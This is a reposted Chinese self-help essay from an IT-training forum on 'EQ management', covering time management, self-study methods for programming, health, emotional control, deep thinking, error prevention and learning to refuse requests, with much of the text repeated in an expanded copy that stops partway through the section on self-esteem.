情商管理「转」

Ansible 发表了文章 • 0 个评论 • 905 次浏览 • 2018-02-01 23:46 • 来自相关话题

一、时间管理的能力​
时间对于学习非常宝贵,这点毋庸多言。清华大学副校长、杰出的生物学家施一公曾说过:无论什么科学,智商都不是最重要的,第一重要的是时间的付出。 著名人大校友和投资人张磊说要做时间的朋友懂得“滞后满足”。你的时间在哪里,你的成就在哪里。 不能因为自己还年轻,就放任自己,放松对时间的管理。人越长大,觉得时间会过得越快,尤其是进入30岁之后,这个感觉就会越来越明显。因为人对年龄的感知是按照对数级增长的,你现在活了8年,相当于小时候活的3(log28)年。我们对时间的感知同样是这样:2~3岁经历了一年,和我已有生命的总长度一样;到了80岁,再经历一年,只是我经历岁月的1/80。“比例感知”让我们对时间的概念,对数级增加。如果要抵消我们的”对数感知“,我们需要让我们的”生命精彩程度“指数级增长---我们要不停的创造”激动人心“的回忆----精彩的、奇怪的、酷的。在人生中树立无数的里程碑:小到读一本新的小说,尝试新的音乐,养一种难以成活的植物;大到下决心去读一个博士学位,在陌生的城市工作3年,写一本书。

关于人们对时间对数感知详情请参考知乎的一个讨论:https://www.zhihu.com/question/30824529。对时间的管理能力,是一个人是否能走向阶段性成功一个很重要的影响因素。那么,如何管理好我们的时间提高我们的工作和学习效率呢?
 

1、优先级原则

用好时间的第一条原则就是优先级原则,把任务计划里一天中,一周中,一个月中,一个季度中,一年中重要的任务放在优先级高的位置,然后花时间优先完成。大家在日常工作,学习和生活中,总会遇到各种任务,有的是重要任务,有的是次要任务,有的是琐事。对这些任务的处理,不能不分先后,不分重点,不能平均用力,要有所为有所不为。

有这样一个生活例子:如果先将一个大的容器里放入土豆,那么这个容器里放满土豆后,还可以再放入大米,当放满大米后,还可以再放入水。但是,如果反过来,先将这个容器里放满了水,就无法再放大米和土豆了,先放满了大米,也就无法再放入土豆了。

这里的土豆,大米和水,分别代表的就是我们的重要任务,次要任务和琐事。只有提前优先处理好重要任务,才能接着处理次要任务和琐事,如果每天都去处理次要任务和琐事了,那么一些重要的任务就无法完成。
 

2、最后期限原则

在采取了优先级原则来处理每个时段的各种任务之后,还得为自己完成这个任务设置一个最后期限(deadline)。人都有懒惰的基因,除非要完成的任务特别有意思你对它特别感兴趣,否则这些自己要着手完成的任务很有可能会被拖延。所以为了防止拖延,必须明确告诉自己,这个任务最迟必须在什么时候完成,如果预计可能延期,那么就需要分配更多时间或者加班来保证合格任务按时完成。最后期限原则能够很好的督促你完成优先级高的任务。
 

3、利用夜晚4个小时

平时大家白天8个小时可能会上班或者上课,每个人花的时间都差不多。但为什么几年后,当时水平差不多的人,有的人就已经步步高升,而有的人还在原地踏步呢?那就是因为有这样一句话:“8小时决定现在,4小时决定未来”。人白天8个小时用于工作,回到家的时间大约为20点,然后24点上床睡觉(8点起床,符合8个小时睡眠要求)。因此这期间有4个小时可以用来学习。但有的人却白白浪费了这个时间,而有的人很好利用了这4个小时不断提高自己,为自己充电。所谓机会总是给有准备的人,越努力越幸运,厚积薄发就是在这里体现出来的。
 

4、大量阅读,看电视,灌水聊天,争论都是浪费生命

无意义的阅读等于浪费生命。很多成功说或者鸡汤告诉大家,一定要多阅读,阅读可以改变人生。实际上,大量无意义的阅读,比如看各种新闻,看微博,看微信,看BBS,看毒鸡汤,在QQ、微信群聊天灌水都会花费大量的时间和精力,影响自己的任务完成。所以,这种阅读是有害的,是一种慢性自杀。

看电视也是慢性自杀。如果一个在人生起步阶段的人一天花费超过3个小时看无聊的电视节目,他一定会一事无成。

再就是与人无意义的争吵和争论。经常有一些学员在麦洛克菲的技术群里发生各种争吵,甚至开始人身攻击。这个时候,我都会出面制止,并告诫他们可以理性讨论,但千万不要做这些无意义的争吵和争论,更不要想着把自己的观点强加于人,没有意义,对你也没有任何好处,反而浪费了你的大量时间,影响了你的好心情。 有一句话说得好,世界上有两件事最难,一是把自己的思想装进别人的脑袋里;二是把别人的钱装进自己的口袋里。 人观点和思想的改变不是靠争论,主要是靠亲身经历,吃过亏上过当了,才会痛彻心扉,更何况有时候我们自己的观点未必就是对的。 随着时间的增长,我们也会不断修正自己的观点和看法。所以,请从现在开始,在与人相处的时候,用友好的态度去探讨问题,拒绝争论或者争吵,谁也别想说服谁,即使说服了谁也是口服心不服,即使心服了也没有任何意义, 少说多做多思考,管住自己这张嘴。
 
二、不断学习能力
有一句话说得好,只有两件事,是一个人一辈子都需要去完成的,一个是学习,一个是锻炼。学习能力的培养,也是一个人能够成功很重要的制约因素。
 

1、快速学习


现代科学技术日新月异,尤其是在IT领域,新的理论,技术和架构更是层出不穷,因此,必须快速的去学习这些新的技术,保持自己的知识与技能与时俱进。

人一旦成年之后,无论是在学校,还是在企业,都不会留给我们太多的学习时间,都需要在规定的时间完成任务。比如在大家求学过程中,花了9年时间学习小学(含幼儿园,学前班)课程,花6年学习中学课程,花4年学习大学课程,花3年学习硕士课程,却只能花2年完成博士课程(硕博连读按5年算的话)。这个学习过程中,随着年龄的增加,要学的知识越来越多,越来越深,给我们学习的时间越来越少。所以,需不断培养自己的快速学习能力,适应新的时代要求。当一个互联网企业把一个任务交到你手头,给你的学习时间是非常短的,也许你用在学习的时间,不会超过3天,一般几个星期或者1个月就会要求做出成果。

有一个大牛曾经说过一句话非常对:我不是懂得多,我只是学得快。
 

2、自学能力

人不可能在学校或者培训机构学一辈子,也不可能一直都有老师教授你知识和技术。因此,自学能力的养成非常重要。在学习IT方面,IT培训的目的是让你少走弯路,带你入门,但培训绝对不会是你学习的终点,而是你学习更多知识的起点。结束培训之后,遇到新的知识,就要善于自学,善于通过使用书籍,视频,技术文档,论坛,搜索引擎等来获取和学习各种知识。

首先我们要有一个意识就是,无论干哪行,学哪个方面的技术,在我们下决心学习它的时候,第一个需要解决的问题就是:学习它可以分为哪几个阶段?每个阶段都有哪几本经典的好书供学习?有什么网络资源或者论坛可供参考?只有在每个阶段都找到了一两本相关的经典的好书,才为我们学习这个方面的技术找准了方向,学习起来也会事半功倍。所以,在我学习程序设计的时候,我对书的要求很高,不是随便拿一本来看,看一本差书,既浪费时间,又毫无收获,而是要找口碑最好,写得非常经典的书籍来看。
 

3、学习方法

在快速学习和自学过程中,需要讲究一些学习方法,而且学习不同的技术,方法也不完全一样。学习任何东西,都是很简单的,起码是有规律的或者可以深入浅出的。如果你学得很吃力,那么肯定是方法或者方向不对。

课前预习,课中跟上老师的思路,积极思考,积极回答问题,课后复习和练习以及答疑,阶段性总结,这些都是学习任何知识的通用方法。

对于学IT编程来说,它的学习路径一般为:认准方向(比如安全方向)==》快速打下基础(C|C++,Java等面向对象|数据结构|Win/Linux/Android平台开发入门|sql,网络协议,多线程)这个阶段侧重于理解动手小练习模仿记忆==》找几个好的开源的项目修改和二次开发学以致用做几个体现自己想法的东西==》进公司锻炼和学习不断提高==》成为有经验的大牛。

学习计算机编程,一定要动手。基础练习不是照着抄一遍,而是按照思路背着写,写不出来再看代码。在看书学习的时候,要习惯性的打开VC等开发工具,经常实践书中的理论和例子。一些重要的代码应该背着写一遍(注意:不是照着抄),加深印象,当背着写不出来的时候,再回头看看书中的代码。要明白,书看懂了,离会写代码还有一段距离,在写代码的时候还会遇到很多问题。遇到问题不要怕,解决了,才是学会了。

抓住学习重点,拒绝均衡用力。学习的时候要有所为有所不为,不要面面俱到,想把书上每个点,每句话或者每句代码都搞懂。基础的东西,抓住重点(每个方向的重点参见《进军IT与安全行业:推荐学习路线图》),必须好好学一下,比如C语言,数据结构和汇编等。但有的东西,一开始不用立即学得深入,了解即可,用到的时候,以项目驱动,再边做边学,深入学。

学习第一遍,可能会比较吃力,一般能够理解50%左右就很不错的,这个时候不要灰心,把问题记下来,然后多看几遍书,“书读百遍其义自见”,这个道理在学习计算机技术的时候同样适用。反复读几次书中内容,理解的程度就可以提高到80%,90%等。或者也可以先把遇到的问题记录下来,等以后再回过头来想这个问题,也许就会觉得豁然开朗没那么难了。学习的时候需要保持高度的注意力,不能边听歌边学习,不能边看电视边学习,不能眼睛在看字头脑却没跟上在想别的事。

面试遇到的问题如果不会,要及时解决。参加求职面试的时候问的问题,都是IT相关行业里重要的知识点,对于相关项目开发具有重要意义。因此,如果在面试的时候遇到不会的问题,面试结束之后,一定要通过不同方式,去获得答案。这也是一个学习的很好机会。否则,下次再遇到,如果还不会,机会就又错过了。
 
三、身体管理能力
有一句话说得很好:一个人的身体健康是1,而财富、感情、事业,家庭……,都是1后面的0,只有依附于这个1,零的存在才会有意义,如果没了这个1,那么一切都将不存在。

IT行业是一个压力大,加班多的行业。因此如果身体不行,很容易出严重的问题。大家也经常在新闻里看到IT领域很多工程师甚至是创始人过劳猝死的例子。因此,一个好的身体,相当重要。

20几岁是人生的黄金阶段,一般病痛不会找上门。但是一旦过了30岁,尤其是35岁之后,就是病找人了。
 

1、健康饮食

健康饮食,对身体健康非常重要。一日三餐,规律饮食,均衡营养合理搭配肉食和蔬菜水果,细嚼慢咽降低胃肠道压力,不吃过烫食物,同时节制饮食,吃什么都最好控制食量,做到7分饱,尤其是晚餐,宁饿不撑,以免加重胃的负担。因此,健康,从管住这张嘴开始。
 
 

2、规律作息

所谓规律作息,最重要的就是别熬夜。尤其是过了30岁之后,每天要保证8个小时的睡眠时间,因此一定要在零点前上床休息。熬夜对身体的伤害非常大,因为这样会让身体器官,尤其是心脏处于全负荷下工作,得不到休息,那么容易造成心脏等罢工从而发生猝死。
 

3、适当锻炼

工作之余,适当的运动和锻炼,是非常有利于身体健康的。比如饭后百步走,游泳,爬山,跑步、打球等等。
 
 

4、定期体检

每年做一到二次身体健康体检,对胃,肝,肾,心脏,结、直肠,肺,血液血脂等进行全面检查,甚至过了一定年龄(比如35岁之后)需要加上胃镜和肠镜的检查对肺进行低剂量CT检查, 及早发现身体不适或者出现三高(高血压、高血脂、高血糖,是对动脉硬化,脑溢血,冠心病的潜在威胁),将大病遏制在摇篮中,排除身体中的各种定时炸弹。
 
 
四、情绪管理能力
情绪管理能力是一个人在情商方面最重要的体现。一个人,只有在能控制自己的各种情绪之后,才能体现出一个高情商的人。有一句说得好,人永远需要两种能力:好好说话和情绪稳定。
 

1、放下自尊心

“世上最肮脏的,莫过于自尊心”--尤瑟纳尔。社会上处久了,才发现自尊心分明就是面皮薄、意志弱,受不起挫折,经不起摔打的代名词。自尊心是颗种子,捧在手上只能枯死,非得踩进泥土,从磨难中汲取养料,成长,成熟。在没有足够的实力前,请勿过分强调你的自尊心。遇到自尊心受到伤害了,一定要善于自我解嘲,知耻而后勇。 

阿里高管彭蕾曾说过:不管别人怎么赞扬你也好,或者羞辱你也好,你内心知道你自己是谁,自己内心是很定的,无论是捧你还是打你,外界的状况都不会伤害到你,这才是真正皮实的状态。对于创业者或者我们组建团队的时候,这个能力蛮重要的。
 

2、远离垃圾人

生活中,我们难免会遇到各种“垃圾人”。他们到处跑来跑去,身上充满了负面垃圾:充满了沮丧、愤怒、忌妒、算计、仇恨,充满了傲慢与偏见、贪心不满足、抱怨、比较,充满了见不得人好、愚昧、无知、烦恼、报复、和充满了失望。随着心中的垃圾堆积又堆积,他们终需找个地方倾倒;有时候,我们刚好碰上了,垃圾就往我们身上丢。 所以,无须介意。只要微笑、挥挥手、远离他们,然后继续走我们自己的路就行。绝对不让垃圾人接管自己生活当中的任何一天。人生短暂,绝对不要浪费心思和精力在这些事上。

千万不能和垃圾人吵起来,甚至大打出手,最后受苦的还是自己,不值得。一物降一物,垃圾人肯定会遇到更狠的人对付他,但与我们无关。有一句话说得好:人给狗让路,不丢人。
 

3、与人为善,与人遇到矛盾,友好的建设性的解决问题

远离垃圾人的同时,也要防止自己成为别人眼中的垃圾人。所以,一定要做到与人为善,尊重对方,客气友好。与人遇到矛盾和问题,一定不要动不动就口出恶言,要友好的建设性的解决问题,起码也得先礼后兵,因为很多后果严重的事件都始于一两句恶语激怒了彼此。千万不要一开始就把问题发展到不可收拾的地步。 

关于互相尊重:“尊重上级是天职;尊重下属是美德;尊重同事是本份;尊重客户是常识;而尊重所有人则是教养。”我们每一个人都要做到这一点,因为尊重他人是良好沟通的基础,而且尊重他人就是尊重自己。 

关于发脾气:把脾气发出来,那叫本能;把脾气压下去,那叫本事。有时候把脾气发出来,发的不是脾气,发的是代价。
 

4、忍一忍,冲动是魔鬼

忍,不是叫你逆来顺受,而是用更好的办法解决问题,不是动不动就两败俱伤。某人惹你生气了,即使你恨不得马上给他一耳光,也要让子弹飞了一会儿。如果过了一晚上,你还是想给他一耳光,那就再想办法,但往往一个晚上后,你改变了主意。不全是忍了,而是想到了更好的解决办法。

同样,凡是有什么想法,尤其是大事情,千万不要冲动决定。在工作中受到了一点小委屈,也不要立即冲动说不干了(最后你会发现,在哪里工作都会有受气的时候)。

大事急事做决定一定要缓一缓,冲动依然会付出代价。有一句说得很好:大事要细办,小事要认真办,急事要缓办。急事宜缓办,忙则多错。说干就干有的时候是执行力的体现,但有时候是冲动的体现,需要仔细辨别。
 

5、不做愤青

马云曾经说过:10年前我更关心全世界,结果日子过得非常艰难;5年前我很关心中国的命运,我也过得很艰难;3年前开始我只关心公司,我的日子开始好起来。现在我只关心自己,越来越好。所以我说,关心好自己,每个人把自己喜欢的事做好,这个世界会好起来,别像奥巴马一样关心全世界。

社会总会存在各种不公,因此,你不要因为你的愤怒而耽误了你自己的行动。首先从改变自己开始,然后就能改变周围的人,再能改变自己的家乡,然后就能改变整个世界。否则,人微言轻,吃着地沟油的命,操着中南海的心,你说了,你愤怒了,但是都不算。
 

6、养成记日记的习惯

 
写日记有很多好处。可以在日记里反省,总结和规划未来,调整自己的心态。日记是一种很好的自我调节的手段。假如人是一颗飞向目标的火箭,那么日记有点修正你跑偏方向的功能。很多成功人士,都有记录日记的习惯。日记不用天天记,需要反省,总结和规划的时候就可以写一写,写的篇幅可长可短。写完之后,可以定期回看一下曾经写的日记,也是一笔宝贵的经历。因为日记里写的都是自己真实的想法和内心,有的东西可能无法让外人直视,所以请注意做好对日记的保密工作。
 

7、讨论可以,但不与人争论(辩论)

正如上面所说,遇到各种不同观点,可以与人理性讨论,但千万不要做这些无意义的争吵和争论,辩论,更不要想着把自己的观点强加于人,没有意义,对你也没有任何好处,反而浪费了你的大量时间,影响了你的好心情。有一句话说得好,世界上有两件事最难,一是把自己的思想装进别人的脑袋里;二是把别人的钱装进自己的口袋里。 人观点和思想的改变不是靠争论,主要是靠亲身经历,吃过亏上过当了,才会痛彻心扉,更何况有时候我们自己的观点未必就是对的。 随着时间的增长,我们也会不断修正自己的观点和看法。所以,请从现在开始,在与人相处的时候,用友好的态度去探讨问题,拒绝争论或者争吵,谁也别想说服谁,即使说服了谁也是口服心不服,即使心服了也没有任何意义,少说多做多思考,管住自己这张嘴。有一个关于孔子与子贡关于“三季人”的故事,可以很好的说明这个问题:

早晨,子贡在大院门口打扫院子。有人来到,问子贡:“您是孔子吗?” 子贡答道:“有什么事需要向我们老师请教?” “我想请教关于时间的问题?” “这个问题我知道,可以回答你” “那你说说一年有几季?” “四季。”子贡笑答。 “不对,一年只有三季!” “四季!!” “三季!!” “四季!!!”子贡理直气壮。 “三季!!!”来人毫不示弱。然后就争论不止,一直争论到中午也没消停。

孔子听到声音,从院内出来,子贡上前讲明原委,让孔子评定。孔子先是不答,观察一阵后说:“一年的确只有三季。“ 来人听此,大笑而去。

待来人走后,子贡忙问老师:“这与您所教有别啊,且一年的确有四季啊! “这一年到底应是几季?”

孔子答:“四季” ,子贡不解。

孔子继而说道:“这时和刚才不同,方才那人一身绿衣。他分明是田间的蚱蜢。蚱蜢者,春天生,秋天亡,一生只经历过春、夏、秋三季,哪里见过冬天?所以在他的思维里,根本就没有‘冬季’这个概念。你跟这样的人那就是争上三天三夜也不会有结果的。你若不顺着他说,他能这么爽快就走吗?你虽然上了个小当,但却学到了莫大一个乖。” 说完,子贡立刻明白了。
 
五、深度思考的能力
有的人看起来也很勤奋,每天也都勤勤恳恳的工作学习和生活,但始终无法向前获得更大的成功。而有的人,平时也不怎么太努力工作,也不怎么太努力学习,却最后过得很好。你在每天挤公交地铁上班,没准人家已经在旅行的路上,在朋友圈晒世界各地的蓝天白云。这是为什么呢?不是说了越努力越幸运吗?

实际上这里有一个战术上的勤奋和战略上的勤奋(思考)的差别。

每天除了完成日常的工作,生活和学习任务,也需要花一点时间来反省过去,总结经验,不断分析现在的问题,找到答案,纠正,思考规划未来,保持方向的正确。

人生是一场持久战和长跑,随时都有机会弯道超车。试着深度思考,永远不要用战术上的勤奋掩盖战略上的懒惰。否则,你每天的忙碌,也无法忙碌出一个精彩的人生。

人生中有些事情,宜早规划早执行。以北京的房价和限车牌限号就是个非常典型的例子。后办者非常被动。

此外,除了工作之外,应该发展一个第二职业或者兼职,能够通过第二职业获得额外的收入,以应对第一职业的35岁现象。第二职业可以是投资(炒股,买房等,但风险较大需要慎重,但高风险意味着高收入。第一次炒股一定要用小本投入,因为第一次一般都会亏,小本当交学费不心疼),也可以去兼职,也可以写书,去当培训老师或者哪怕是开淘宝,摆地摊。总之,一定要趁年轻,多找事做。
 
六、遏制错误的能力
每个人都会犯错误。但是,我们应该拥有高度的责任来遏制错误的发生,因为错误一旦发生,就意味着会有代价或者损失,有的损失或者代价甚至是巨大而不可挽回的。
 

1、堵住逻辑漏洞

做事情的时候,要符合逻辑和一定的流程,不能有任何疏忽。把该考虑的因素都必须考虑进来,不能相信口头承诺。在处理文字或者签订合同的时候,也要严谨, 不能有漏洞,要善于使用不同的方法(比如提前调查各种背景,提前向自己的亲戚朋友征询意见和建议(个人的认识和经历总有局限性,因此一定要参考大家的意见))发现其中的坑,然后及早提出问题,先小人后君子。否则,问题就会越来越大,错误会越来越严重。
 
 

2、克服粗心,反复检查

有一类错误,是因为粗心大意造成的,这类错误最好克服。方法就是:反复检查。比如你发一条短信,发一封邮件给领导,里面由于粗心可能会出现各种错别字。但是,只要你态度认真,打完字之后,再仔细看过检查一两遍,这种问题就会解决。
 

3、预判并解决存在的问题,防患于未然

有时候,错误是可以预测到的,那么这个时候为了防止错误的发生,请立即采取措施解除错误的隐患。比如你看到电脑旁边有一杯水,你应该会预测到这杯水可能会不小心被碰倒洒到电脑上,造成电脑故障。那么一旦预判到这个错误可能发生之后,立即采取行动,把这杯水喝掉或者移开到安全地方,就可以完全预防可能发生的错误。 

孔子曰”君子不立于危墙之下”,君子要远离危险的地方。这包括两方面:一是防患于未然,预先觉察潜在的危险,并采取防范措施;二是一旦发现自己处于危险境地,要及时离开。
 

4、遵守规则,程序

遵守社会中指定的规则,流程,和程序,可以防止错误的发生。社会中的规则是这个社会平安健康运行的一套科学总结,不可违规,否则会造成严重的错误和不可挽回的损失。比如不要酒后驾车,不要闯红灯,比如乘车前先要进行安检,比如医院的“一人一管一抛弃”,甚至进入野生动物园不要下车,这些都是一些常见的社会规则,流程,不可打破。要有敬畏之心,严格遵守,否则就会出现各种严重的车祸,恐怖袭击,医疗事故,危及生命安全造成严重后果。
 
七、学会拒绝的能力
有的时候,大家由于年轻,缺乏足够的社会经验,对于别人提出的非分要求(比如借钱),碍于情面,不好意思拒绝,硬着头皮答应,结果非常被动,甚至给自己带来严重后果。

这里给大家的一句话就是:别不好意思拒绝别人,反正那些好意思为难你的人都不是什么好人。因此,对于别人提的一些要求,仔细分析是否为过分要求,如果是过分要求,我们应该要敢于拒绝,善于拒绝。
 
转载分享阅读:http://mallocfree.com/basic/c/eq.htm  查看全部
一、时间管理的能力​
时间对于学习非常宝贵,这点毋庸多言。清华大学副校长、杰出的生物学家施一公曾说过:无论什么科学,智商都不是最重要的,第一重要的是时间的付出。 著名人大校友和投资人张磊说要做时间的朋友懂得“滞后满足”。你的时间在哪里,你的成就在哪里。 不能因为自己还年轻,就放任自己,放松对时间的管理。人越长大,觉得时间会过得越快,尤其是进入30岁之后,这个感觉就会越来越明显。因为人对年龄的感知是按照对数级增长的,你现在活了8年,相当于小时候活的3(log28)年。我们对时间的感知同样是这样:2~3岁经历了一年,和我已有生命的总长度一样;到了80岁,再经历一年,只是我经历岁月的1/80。“比例感知”让我们对时间的概念,对数级增加。如果要抵消我们的”对数感知“,我们需要让我们的”生命精彩程度“指数级增长---我们要不停的创造”激动人心“的回忆----精彩的、奇怪的、酷的。在人生中树立无数的里程碑:小到读一本新的小说,尝试新的音乐,养一种难以成活的植物;大到下决心去读一个博士学位,在陌生的城市工作3年,写一本书。

关于人们对时间对数感知详情请参考知乎的一个讨论:https://www.zhihu.com/question/30824529。对时间的管理能力,是一个人是否能走向阶段性成功一个很重要的影响因素。那么,如何管理好我们的时间提高我们的工作和学习效率呢?
 


1、优先级原则


用好时间的第一条原则就是优先级原则,把任务计划里一天中,一周中,一个月中,一个季度中,一年中重要的任务放在优先级高的位置,然后花时间优先完成。大家在日常工作,学习和生活中,总会遇到各种任务,有的是重要任务,有的是次要任务,有的是琐事。对这些任务的处理,不能不分先后,不分重点,不能平均用力,要有所为有所不为。

有这样一个生活例子:如果先将一个大的容器里放入土豆,那么这个容器里放满土豆后,还可以再放入大米,当放满大米后,还可以再放入水。但是,如果反过来,先将这个容器里放满了水,就无法再放大米和土豆了,先放满了大米,也就无法再放入土豆了。

这里的土豆,大米和水,分别代表的就是我们的重要任务,次要任务和琐事。只有提前优先处理好重要任务,才能接着处理次要任务和琐事,如果每天都去处理次要任务和琐事了,那么一些重要的任务就无法完成。
 


2、最后期限原则


在采取了优先级原则来处理每个时段的各种任务之后,还得为自己完成这个任务设置一个最后期限(deadline)。人都有懒惰的基因,除非要完成的任务特别有意思你对它特别感兴趣,否则这些自己要着手完成的任务很有可能会被拖延。所以为了防止拖延,必须明确告诉自己,这个任务最迟必须在什么时候完成,如果预计可能延期,那么就需要分配更多时间或者加班来保证合格任务按时完成。最后期限原则能够很好的督促你完成优先级高的任务。
 


3、利用夜晚4个小时


平时大家白天8个小时可能会上班或者上课,每个人花的时间都差不多。但为什么几年后,当时水平差不多的人,有的人就已经步步高升,而有的人还在原地踏步呢?那就是因为有这样一句话:“8小时决定现在,4小时决定未来”。人白天8个小时用于工作,回到家的时间大约为20点,然后24点上床睡觉(8点起床,符合8个小时睡眠要求)。因此这期间有4个小时可以用来学习。但有的人却白白浪费了这个时间,而有的人很好利用了这4个小时不断提高自己,为自己充电。所谓机会总是给有准备的人,越努力越幸运,厚积薄发就是在这里体现出来的。
 


4、大量阅读,看电视,灌水聊天,争论都是浪费生命


无意义的阅读等于浪费生命。很多成功说或者鸡汤告诉大家,一定要多阅读,阅读可以改变人生。实际上,大量无意义的阅读,比如看各种新闻,看微博,看微信,看BBS,看毒鸡汤,在QQ、微信群聊天灌水都会花费大量的时间和精力,影响自己的任务完成。所以,这种阅读是有害的,是一种慢性自杀。

看电视也是慢性自杀。如果一个在人生起步阶段的人一天花费超过3个小时看无聊的电视节目,他一定会一事无成。

再就是与人无意义的争吵和争论。经常有一些学员在麦洛克菲的技术群里发生各种争吵,甚至开始人身攻击。这个时候,我都会出面制止,并告诫他们可以理性讨论,但千万不要做这些无意义的争吵和争论,更不要想着把自己的观点强加于人,没有意义,对你也没有任何好处,反而浪费了你的大量时间,影响了你的好心情。 有一句话说得好,世界上有两件事最难,一是把自己的思想装进别人的脑袋里;二是把别人的钱装进自己的口袋里。 人观点和思想的改变不是靠争论,主要是靠亲身经历,吃过亏上过当了,才会痛彻心扉,更何况有时候我们自己的观点未必就是对的。 随着时间的增长,我们也会不断修正自己的观点和看法。所以,请从现在开始,在与人相处的时候,用友好的态度去探讨问题,拒绝争论或者争吵,谁也别想说服谁,即使说服了谁也是口服心不服,即使心服了也没有任何意义, 少说多做多思考,管住自己这张嘴。
 
二、不断学习能力
有一句话说得好,只有两件事,是一个人一辈子都需要去完成的,一个是学习,一个是锻炼。学习能力的培养,也是一个人能够成功很重要的制约因素。
 


1、快速学习



现代科学技术日新月异,尤其是在IT领域,新的理论,技术和架构更是层出不穷,因此,必须快速的去学习这些新的技术,保持自己的知识与技能与时俱进。

人一旦成年之后,无论是在学校,还是在企业,都不会留给我们太多的学习时间,都需要在规定的时间完成任务。比如在大家求学过程中,花了9年时间学习小学(含幼儿园,学前班)课程,花6年学习中学课程,花4年学习大学课程,花3年学习硕士课程,却只能花2年完成博士课程(硕博连读按5年算的话)。这个学习过程中,随着年龄的增加,要学的知识越来越多,越来越深,给我们学习的时间越来越少。所以,需不断培养自己的快速学习能力,适应新的时代要求。当一个互联网企业把一个任务交到你手头,给你的学习时间是非常短的,也许你用在学习的时间,不会超过3天,一般几个星期或者1个月就会要求做出成果。

有一个大牛曾经说过一句话非常对:我不是懂得多,我只是学得快。
 


2、自学能力


人不可能在学校或者培训机构学一辈子,也不可能一直都有老师教授你知识和技术。因此,自学能力的养成非常重要。在学习IT方面,IT培训的目的是让你少走弯路,带你入门,但培训绝对不会是你学习的终点,而是你学习更多知识的起点。结束培训之后,遇到新的知识,就要善于自学,善于通过使用书籍,视频,技术文档,论坛,搜索引擎等来获取和学习各种知识。

首先我们要有一个意识就是,无论干哪行,学哪个方面的技术,在我们下决心学习它的时候,第一个需要解决的问题就是:学习它可以分为哪几个阶段?每个阶段都有哪几本经典的好书供学习?有什么网络资源或者论坛可供参考?只有在每个阶段都找到了一两本相关的经典的好书,才为我们学习这个方面的技术找准了方向,学习起来也会事半功倍。所以,在我学习程序设计的时候,我对书的要求很高,不是随便拿一本来看,看一本差书,既浪费时间,又毫无收获,而是要找口碑最好,写得非常经典的书籍来看。
 


3、学习方法


在快速学习和自学过程中,需要讲究一些学习方法,而且学习不同的技术,方法也不完全一样。学习任何东西,都是很简单的,起码是有规律的或者可以深入浅出的。如果你学得很吃力,那么肯定是方法或者方向不对。

课前预习,课中跟上老师的思路,积极思考,积极回答问题,课后复习和练习以及答疑,阶段性总结,这些都是学习任何知识的通用方法。

对于学IT编程来说,它的学习路径一般为:认准方向(比如安全方向)==》快速打下基础(C|C++,Java等面向对象|数据结构|Win/Linux/Android平台开发入门|sql,网络协议,多线程)这个阶段侧重于理解动手小练习模仿记忆==》找几个好的开源的项目修改和二次开发学以致用做几个体现自己想法的东西==》进公司锻炼和学习不断提高==》成为有经验的大牛。

学习计算机编程,一定要动手。基础练习不是照着抄一遍,而是按照思路背着写,写不出来再看代码。在看书学习的时候,要习惯性的打开VC等开发工具,经常实践书中的理论和例子。一些重要的代码应该背着写一遍(注意:不是照着抄),加深印象,当背着写不出来的时候,再回头看看书中的代码。要明白,书看懂了,离会写代码还有一段距离,在写代码的时候还会遇到很多问题。遇到问题不要怕,解决了,才是学会了。

抓住学习重点,拒绝均衡用力。学习的时候要有所为有所不为,不要面面俱到,想把书上每个点,每句话或者每句代码都搞懂。基础的东西,抓住重点(每个方向的重点参见《进军IT与安全行业:推荐学习路线图》),必须好好学一下,比如C语言,数据结构和汇编等。但有的东西,一开始不用立即学得深入,了解即可,用到的时候,以项目驱动,再边做边学,深入学。

学习第一遍,可能会比较吃力,一般能够理解50%左右就很不错的,这个时候不要灰心,把问题记下来,然后多看几遍书,“书读百遍其义自见”,这个道理在学习计算机技术的时候同样适用。反复读几次书中内容,理解的程度就可以提高到80%,90%等。或者也可以先把遇到的问题记录下来,等以后再回过头来想这个问题,也许就会觉得豁然开朗没那么难了。学习的时候需要保持高度的注意力,不能边听歌边学习,不能边看电视边学习,不能眼睛在看字头脑却没跟上在想别的事。

面试遇到的问题如果不会,要及时解决。参加求职面试的时候问的问题,都是IT相关行业里重要的知识点,对于相关项目开发具有重要意义。因此,如果在面试的时候遇到不会的问题,面试结束之后,一定要通过不同方式,去获得答案。这也是一个学习的很好机会。否则,下次再遇到,如果还不会,机会就又错过了。
 
三、身体管理能力
有一句话说得很好:一个人的身体健康是1,而财富、感情、事业,家庭……,都是1后面的0,只有依附于这个1,零的存在才会有意义,如果没了这个1,那么一切都将不存在。

IT行业是一个压力大,加班多的行业。因此如果身体不行,很容易出严重的问题。大家也经常在新闻里看到IT领域很多工程师甚至是创始人过劳猝死的例子。因此,一个好的身体,相当重要。

20几岁是人生的黄金阶段,一般病痛不会找上门。但是一旦过了30岁,尤其是35岁之后,就是病找人了。
 


1、健康饮食


健康饮食,对身体健康非常重要。一日三餐,规律饮食,均衡营养合理搭配肉食和蔬菜水果,细嚼慢咽降低胃肠道压力,不吃过烫食物,同时节制饮食,吃什么都最好控制食量,做到7分饱,尤其是晚餐,宁饿不撑,以免加重胃的负担。因此,健康,从管住这张嘴开始。
 
 


2、规律作息


所谓规律作息,最重要的就是别熬夜。尤其是过了30岁之后,每天要保证8个小时的睡眠时间,因此一定要在零点前上床休息。熬夜对身体的伤害非常大,因为这样会让身体器官,尤其是心脏处于全负荷下工作,得不到休息,那么容易造成心脏等罢工从而发生猝死。
 


3、适当锻炼


工作之余,适当的运动和锻炼,是非常有利于身体健康的。比如饭后百步走,游泳,爬山,跑步、打球等等。
 
 


4、定期体检


每年做一到二次身体健康体检,对胃,肝,肾,心脏,结、直肠,肺,血液血脂等进行全面检查,甚至过了一定年龄(比如35岁之后)需要加上胃镜和肠镜的检查对肺进行低剂量CT检查, 及早发现身体不适或者出现三高(高血压、高血脂、高血糖,是对动脉硬化,脑溢血,冠心病的潜在威胁),将大病遏制在摇篮中,排除身体中的各种定时炸弹。
 
 
四、情绪管理能力
情绪管理能力是一个人在情商方面最重要的体现。一个人,只有在能控制自己的各种情绪之后,才能体现出一个高情商的人。有一句说得好,人永远需要两种能力:好好说话和情绪稳定。
 


1、放下自尊心


“世上最肮脏的,莫过于自尊心”--尤瑟纳尔。社会上处久了,才发现自尊心分明就是面皮薄、意志弱,受不起挫折,经不起摔打的代名词。自尊心是颗种子,捧在手上只能枯死,非得踩进泥土,从磨难中汲取养料,成长,成熟。在没有足够的实力前,请勿过分强调你的自尊心。遇到自尊心受到伤害了,一定要善于自我解嘲,知耻而后勇。 

